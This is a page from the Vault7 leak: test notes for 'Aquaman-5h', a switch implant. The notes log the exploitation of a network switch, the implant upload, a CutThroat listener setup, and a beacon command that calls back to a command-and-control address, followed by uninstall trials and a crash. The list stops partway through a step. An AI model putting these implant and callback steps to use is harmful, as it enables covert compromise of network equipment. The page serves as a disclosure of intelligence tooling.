Vault7: CIA Hacking Tools Revealed
Owner: User #71467
Aquaman-5h-Without-Snooping Test Notes
Xetron redelivered Aquaman-5h without snooping as an interim solution to EAR 5244. Plan is to run through Smoke tests from previous Aquaman-5h testing, as well as verify that the bug from EAR 5244 is not reproducible.
Progress / Notes
- Run through HG Base Smoke Tests
- Install/Uninstall without leave-behind
- Establish baseline values for clean target device - skipped because we already have that data from previous testing
- IAC attack - successful, received codes were 125, 60, 159 which are in the readme
- Edited target-aliases to use target address 172.31.255.14
- Edited target-aliases to use correct proc_id
- HG upload - hg_start, left 1s delay between packets
- HG uploaded successfully - result good
- Establish CT Session with HG according to readme
- Edit Aquaman-5h.txt hostfile - set listening interface of flux node to eth0 and IP to trigger to 192.168.21.10 (Seeds host)
- Ran ./prep-ct.sh
- Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
- Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
- 0011.bb89.21c4 is MAC address of 192.168.21.1
- Successful HG comms
- Uninstall according to readme
- device uninstall_hg -mp -f - Successful
- Memory back down, no syslog messages, no crash
- Install/Uninstall with leave-behind
- Reloaded switch to start with a clean switch
- SSHIAC attack - successful, received codes were in readme
- HG upload - hg_start_leave_behind - 1s delay between packets - Successful
- Collected a show tech
- Establish CT Session with HG according to readme
- Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
- Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
- 0011.bb89.21c4 is MAC address of 192.168.21.1
- Successful HG comms
- Uninstall according to readme - successful, no anomalies seen
- Did Broad on remote - ok
- hg_start to reinstall
- While hg was reinstalling, I typed show stacks on switch - 1s later the switch crashed with the following error:
Instruction Access Exception (0x0400)!
Not sure if this was related to entering show stacks while hg reinstall taking place or if that was a coincidence
- Attempt to reproduce the crash
- SSHIAC attack
- Changed interpacket time to 0.1s
- hg_start_leave_behind - successful
- Establish CT Session
- Uninstall according to readme - successful, no anomalies seen
- hg_start to reinstall
- No show commands entered - successful reinstall
- Uninstall hg - successful
- hg_start to reinstall
- this time, enter show stacks during install